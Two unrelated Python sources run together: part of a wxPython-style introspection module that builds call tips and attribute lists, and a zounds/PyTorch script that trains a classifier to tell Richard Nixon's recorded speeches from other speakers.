    # Get attributes available through the normal convention.
    attributes = dir(object)
    attrdict[(key, 'dir', len(attributes))] = attributes
    # Get attributes from the object's dictionary, if it has one.
    try:
        attributes = object.__dict__.keys()
        attributes.sort()
    except: # Must catch all because object might have __getattr__.
        pass
    else:
        attrdict[(key, '__dict__', len(attributes))] = attributes
    # For a class instance, get the attributes for the class.
    try:
        klass = object.__class__
    except: # Must catch all because object might have __getattr__.
        pass
    else:
        if klass is object:
            # Break a circular reference. This happens with extension
            # classes.
            pass
        else:
            attrdict.update(getAllAttributeNames(klass))
    # Also get attributes from any and all parent classes.
    try:
        bases = object.__bases__
    except: # Must catch all because object might have __getattr__.
        pass
    else:
        # NOTE: types.TupleType / types.TypeType are Python 2 only names.
        if isinstance(bases, types.TupleType):
            for base in bases:
                if type(base) is types.TypeType:
                    # Break a circular reference. Happens in Python 2.2.
                    pass
                else:
                    attrdict.update(getAllAttributeNames(base))
    return attrdict
def getCallTip(command='', locals=None):
    """For a command, return a tuple of object name, argspec, tip text.

    The call tip information will be based on the locals namespace.
    Returns ('', '', '') when the command's root cannot be evaluated."""
    calltip = ('', '', '') # object name, argspec, tip text.
    # Get the proper chunk of code from the command.
    root = getRoot(command, terminator='(')
    try:
        if locals is not None:
            object = eval(root, locals)
        else:
            object = eval(root)
    except:
        # Anything can go wrong evaluating arbitrary user input; fall
        # back to an empty call tip.
        return calltip
    name = ''
    # Unwrap methods/classes/callable instances down to the underlying
    # function, and learn whether the implicit first arg is dropped.
    object, dropSelf = getBaseObject(object)
    try:
        name = object.__name__
    except AttributeError:
        pass
    tip1 = ''
    argspec = ''
    if inspect.isbuiltin(object):
        # Builtin functions don't have an argspec that we can get.
        pass
    elif inspect.isfunction(object):
        # tip1 is a string like: "getCallTip(command='', locals=None)"
        argspec = apply(inspect.formatargspec, inspect.getargspec(object))
        if dropSelf:
            # The first parameter to a method is a reference to an
            # instance, usually coded as "self", and is usually passed
            # automatically by Python; therefore we want to drop it.
            temp = argspec.split(',')
            if len(temp) == 1:  # No other arguments.
                argspec = '()'
            elif temp[0][:2] == '(*': # first param is like *args, not self
                pass
            else:  # Drop the first argument.
                argspec = '(' + ','.join(temp[1:]).lstrip()
    tip1 = name + argspec
    doc = ''
    if callable(object):
        try:
            doc = inspect.getdoc(object)
        except:
            pass
    if doc:
        # tip2 is the first separated line of the docstring, like:
        # "Return call tip text for a command."
        # tip3 is the rest of the docstring, like:
        # "The call tip information will be based on ... <snip>
        firstline = doc.split('\n')[0].lstrip()
        # Suppress tip1 when the docstring already opens with the
        # signature, to avoid showing it twice.
        if tip1 == firstline or firstline[:len(name)+1] == name+'(':
            tip1 = ''
        else:
            tip1 += '\n\n'
        docpieces = doc.split('\n\n')
        tip2 = docpieces[0]
        tip3 = '\n\n'.join(docpieces[1:])
        tip = '%s%s\n\n%s' % (tip1, tip2, tip3)
    else:
        tip = tip1
    calltip = (name, argspec[1:-1], tip.strip())
    return calltip
def getRoot(command, terminator=None):
    """Return the rightmost root portion of an arbitrary Python command.

    Return only the root portion that can be eval()'d without side
    effects. The command would normally terminate with a '(' or
    '.'. The terminator and anything after the terminator will be
    dropped."""
    # Work on the last physical line only, minus any continuation prompt.
    command = command.split('\n')[-1]
    if command.startswith(sys.ps2):
        command = command[len(sys.ps2):]
    command = command.lstrip()
    command = rtrimTerminus(command, terminator)
    tokens = getTokens(command)
    if not tokens:
        return ''
    if tokens[-1][0] is tokenize.ENDMARKER:
        # Remove the end marker.
        del tokens[-1]
    if not tokens:
        return ''
    if terminator == '.' and \
           (tokens[-1][1] <> '.' or tokens[-1][0] is not tokenize.OP):
        # Trap decimals in numbers, versus the dot operator.
        return ''
    else:
        # Strip off the terminator.
        if terminator and command.endswith(terminator):
            size = 0 - len(terminator)
            command = command[:size]
    command = command.rstrip()
    tokens = getTokens(command)
    tokens.reverse()
    line = ''
    start = None
    prefix = ''
    laststring = '.'
    emptyTypes = ('[]', '()', '{}')
    # Scan backwards from the end of the line, extending the root until
    # a token that cannot belong to it is reached.
    for token in tokens:
        tokentype = token[0]
        tokenstring = token[1]
        line = token[4]
        if tokentype is tokenize.ENDMARKER:
            continue
        if tokentype in (tokenize.NAME, tokenize.STRING, tokenize.NUMBER) \
        and laststring != '.':
            # We've reached something that's not part of the root.
            if prefix and line[token[3][1]] != ' ':
                # If it doesn't have a space after it, remove the prefix.
                prefix = ''
            break
        if tokentype in (tokenize.NAME, tokenize.STRING, tokenize.NUMBER) \
        or (tokentype is tokenize.OP and tokenstring == '.'):
            if prefix:
                # The prefix isn't valid because it comes after a dot.
                prefix = ''
                break
            else:
                # start represents the last known good point in the line.
                start = token[2][1]
        elif len(tokenstring) == 1 and tokenstring in ('[({])}'):
            # Remember, we're working backwords.
            # So prefix += tokenstring would be wrong.
            if prefix in emptyTypes and tokenstring in ('[({'):
                # We've already got an empty type identified so now we
                # are in a nested situation and we can break out with
                # what we've got.
                break
            else:
                prefix = tokenstring + prefix
        else:
            # We've reached something that's not part of the root.
            break
        laststring = tokenstring
    if start is None:
        start = len(line)
    root = line[start:]
    if prefix in emptyTypes:
        # Empty types are safe to be eval()'d and introspected.
        root = prefix + root
    return root
def getTokens(command):
    """Return list of token tuples for command.

    Tokenization stops quietly at a premature EOF, so partial commands
    (e.g. an unfinished call) still yield their leading tokens."""
    # In case the command is unicode try encoding it
    if type(command) == unicode:
        try:
            command = command.encode(wx.GetDefaultPyEncoding())
        except UnicodeEncodeError:
            pass # otherwise leave it alone
    f = cStringIO.StringIO(command)
    # tokens is a list of token tuples, each looking like:
    # (type, string, (srow, scol), (erow, ecol), line)
    tokens = []
    # Can't use list comprehension:
    # tokens = [token for token in tokenize.generate_tokens(f.readline)]
    # because of need to append as much as possible before TokenError.
    try:
        ## This code wasn't backward compatible with Python 2.1.3.
        ##
        ## for token in tokenize.generate_tokens(f.readline):
        ##     tokens.append(token)
        # This works with Python 2.1.3 (with nested_scopes).
        def eater(*args):
            # Collect each token tuple as the tokenizer produces it.
            tokens.append(args)
        tokenize.tokenize_loop(f.readline, eater)
    except tokenize.TokenError:
        # This is due to a premature EOF, which we expect since we are
        # feeding in fragments of Python code.
        pass
    return tokens
def rtrimTerminus(command, terminator=None):
    """Return command truncated just after its final terminator.

    If the terminator is empty/None or never occurs in the command, the
    command is returned unchanged."""
    if not terminator:
        return command
    pieces = command.split(terminator)
    if len(pieces) < 2:
        # Terminator never occurs; nothing to trim.
        return command
    # Keep everything up to and including the last terminator.
    return terminator.join(pieces[:-1]) + terminator
def getBaseObject(object):
    """Return base object and dropSelf indicator for an object.

    Unwraps methods, classes and callable instances to the underlying
    function; dropSelf is 1 when that function's first parameter is an
    implicit instance reference that call tips should hide."""
    if inspect.isbuiltin(object):
        # Builtins expose no argspec, so there is nothing to unwrap.
        return object, 0
    if inspect.ismethod(object):
        # inspect.getargspec() wants the function, not the method wrapper.
        try:
            if object.im_self is None:
                # Unbound method: an instance must still be passed
                # explicitly as the first argument, so keep self.
                return object, 0
            return object.im_func, 1
        except AttributeError:
            return object, 0
    if inspect.isclass(object):
        # Calling a class invokes __init__, so describe that instead.
        constructor = getConstructor(object)
        if constructor is None:
            return object, 0
        return constructor, 1
    if callable(object):
        # A callable instance is invoked through its __call__ method.
        try:
            return object.__call__.im_func, 1
        except AttributeError:
            return object, 0
    return object, 0
def getConstructor(object):
    """Return constructor for class object, or None if there isn't one."""
    try:
        # The class defines (or inherits via its dict) __init__ directly.
        return object.__init__.im_func
    except AttributeError:
        pass
    # No constructor of its own; search the base classes depth-first.
    for base in object.__bases__:
        found = getConstructor(base)
        if found is not None:
            return found
    return None
| |
import featureflow as ff
import numpy as np
import zounds
from torch import nn
from torch import optim
import argparse
from multiprocessing.pool import ThreadPool, cpu_count
# Common samplerate every ingested sound is resampled to.
samplerate = zounds.SR11025()
# Base pipeline: resample, then short-time Fourier transform (stored).
BaseModel = zounds.stft(resample_to=samplerate, store_fft=True)
# Geometric frequency scale: 64 bands with centers from 300 Hz to
# 3040 Hz and a fixed bandwidth-to-center ratio.
scale = zounds.GeometricScale(
    start_center_hz=300,
    stop_center_hz=3040,
    bandwidth_ratio=0.07496,
    n_bands=64)
# Widen bands as needed so adjacent bands overlap by at least 50%.
scale.ensure_overlap_ratio(0.5)
@zounds.simple_lmdb_settings('speeches', map_size=1e10, user_supplied_id=True)
class Sound(BaseModel):
    """
    An audio processing pipeline that computes a frequency domain representation
    of the sound that follows a geometric scale
    """
    # Perceptually-motivated Bark-band spectrogram; used below as the
    # visualization feature for the in-browser app.
    bark = zounds.ArrayWithUnitsFeature(
        zounds.BarkBands,
        samplerate=samplerate,
        stop_freq_hz=samplerate.nyquist,
        needs=BaseModel.fft,
        store=True)
    # Long, half-overlapping windows (716 ms duration, 358 ms hop) over
    # the resampled audio, shaped by an Ogg Vorbis window function.
    long_windowed = zounds.ArrayWithUnitsFeature(
        zounds.SlidingWindow,
        wscheme=zounds.SampleRate(
            frequency=zounds.Milliseconds(358),
            duration=zounds.Milliseconds(716)),
        wfunc=zounds.OggVorbisWindowingFunc(),
        needs=BaseModel.resampled,
        store=True)
    # FFT of each long window.
    long_fft = zounds.ArrayWithUnitsFeature(
        zounds.FFT,
        needs=long_windowed,
        store=True)
    # Frequency-adaptive representation over the module-level geometric
    # scale; recomputed on demand rather than stored.
    freq_adaptive = zounds.FrequencyAdaptiveFeature(
        zounds.FrequencyAdaptiveTransform,
        transform=np.fft.irfft,
        scale=scale,
        window_func=np.hanning,
        needs=long_fft,
        store=False)
    # Rasterize the frequency-adaptive feature into width-64 patches,
    # the network's expected input size.
    rasterized = zounds.ArrayWithUnitsFeature(
        lambda fa: fa.rasterize(64),
        needs=freq_adaptive,
        store=False)
class DiscriminatorLayer(nn.Module):
    """One repeated unit of the Discriminator.

    Applies Conv2d (no bias) -> BatchNorm2d -> LeakyReLU(0.2) ->
    Dropout(0.5).  With the default stride (equal to the kernel size)
    the convolution is non-overlapping and halves each spatial dim for
    the default (2, 2) kernel."""

    def __init__(
            self,
            in_channels,
            out_channels,
            kernel_size=(2, 2),
            stride=None):
        super(DiscriminatorLayer, self).__init__()
        # Default to a non-overlapping convolution: stride == kernel.
        stride = kernel_size if stride is None else stride
        self.conv = nn.Conv2d(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            stride=stride,
            bias=False)
        self.batch_norm = nn.BatchNorm2d(out_channels)
        self.relu = nn.LeakyReLU(0.2)
        self.dropout = nn.Dropout(0.5)

    def forward(self, inp):
        # Run the four stages in order: conv, norm, activation, dropout.
        return self.dropout(self.relu(self.batch_norm(self.conv(inp))))
class Discriminator(nn.Module):
    """Binary classifier over single-channel 64x64 patches.

    Five DiscriminatorLayer stages halve the spatial dims from 64 down
    to 2 while deepening the channels (1 -> 512); a final stride-2
    convolution and sigmoid reduce that to one probability per patch."""

    def __init__(self):
        super(Discriminator, self).__init__()
        stages = [
            DiscriminatorLayer(1, 32),
            DiscriminatorLayer(32, 64),
            DiscriminatorLayer(64, 128),
            DiscriminatorLayer(128, 256),
            DiscriminatorLayer(256, 512),
            nn.Conv2d(512, 1, (2, 2), (2, 2), bias=False),
            nn.Sigmoid(),
        ]
        self.main = nn.Sequential(*stages)

    def forward(self, inp):
        # Flatten whatever leading shape arrives into a batch of
        # single-channel 64x64 images before classifying.
        batch = inp.view(-1, 1, 64, 64)
        return self.main(batch)
def speaker_identification_pipeline(epochs):
    """Build and return the training-pipeline class for the classifier.

    The returned featureflow model class, when processed with a stream
    of (data, labels) dicts, shuffles a fixed number of samples, mu-law
    compresses and per-instance scales the data, trains the
    Discriminator for `epochs` passes, and stores the resulting
    preprocessing pipeline.
    """
    @zounds.simple_settings
    class RichardNixonIdentifier(ff.BaseModel):
        # Raw iterator of training dicts supplied by the caller.
        docs = ff.PickleFeature(
            ff.IteratorNode,
            store=False)
        # Draw a fixed-size shuffled sample of (data, labels) pairs.
        shuffled = ff.PickleFeature(
            zounds.ShuffledSamples,
            nsamples=int(1e5),
            multiplexed=True,
            dtype=np.float32,
            needs=docs,
            store=False)
        # Mu-law compress the 'data' aspect of the samples.
        mu_law_source = ff.PickleFeature(
            zounds.MuLawCompressed,
            needs=shuffled.aspect('data'),
            store=False)
        # Scale each instance independently before training.
        scaled_source = ff.PickleFeature(
            zounds.InstanceScaling,
            needs=mu_law_source,
            store=False)
        # Train the convolutional classifier with binary cross-entropy;
        # half the data is held out for validation.
        network = ff.PickleFeature(
            zounds.PyTorchNetwork,
            trainer=zounds.SupervisedTrainer(
                model=Discriminator(),
                loss=nn.BCELoss(),
                optimizer=lambda model:
                optim.Adam(model.parameters(), lr=0.00005),
                epochs=epochs,
                batch_size=64,
                holdout_percent=0.5),
            needs=dict(data=scaled_source, labels=shuffled.aspect('labels')),
            store=False)
        # Persist the assembled preprocessing + network pipeline.
        pipeline = ff.PickleFeature(
            zounds.PreprocessingPipeline,
            needs=(mu_law_source, scaled_source, network),
            store=True)
    return RichardNixonIdentifier
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--epochs',
        help='how many epochs (full passes over data) should the network train',
        default=100,
        type=int)
    parser.add_argument(
        '--force',
        help='retrain the network, even if its already been trained',
        action='store_true',
        default=False)
    args = parser.parse_args()

    # Download (if not already present) and index the speech corpus.
    zounds.ingest(
        zounds.InternetArchive('Greatest_Speeches_of_the_20th_Century'),
        Sound,
        multi_threaded=True)

    def generate_training_and_test_set():
        """Yield balanced positive (Nixon) and negative (non-Nixon)
        examples as dicts of (data, labels) for the pipeline."""
        snds = list(Sound)
        # get all sounds where Nixon is the speaker
        nixon = [snd for snd in snds if 'Nixon' in snd.meta['artist']]
        # get an equal number of speeches by anyone besides Nixon.
        # BUG FIX: filter() returns a lazy iterator on Python 3 and
        # cannot be sliced; build a list instead (same result on py2).
        not_nixon = [
            snd for snd in snds if 'Nixon' not in snd.meta['artist']
        ][:len(nixon)]
        for snd in nixon:
            yield dict(
                data=snd.rasterized,
                labels=np.ones((len(snd.rasterized), 1)))
        for snd in not_nixon:
            yield dict(
                data=snd.rasterized,
                labels=np.zeros((len(snd.rasterized), 1)))

    RichardNixonIdentifier = speaker_identification_pipeline(args.epochs)
    # Train only when no trained pipeline exists, unless --force is set.
    if not RichardNixonIdentifier.exists() or args.force:
        RichardNixonIdentifier.process(docs=generate_training_and_test_set())
    rni = RichardNixonIdentifier()

    # start up an in-browser REPL to interact with the results
    app = zounds.ZoundsApp(
        model=Sound,
        audio_feature=Sound.ogg,
        visualization_feature=Sound.bark,
        globals=globals(),
        locals=locals())
    app.start(8888)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.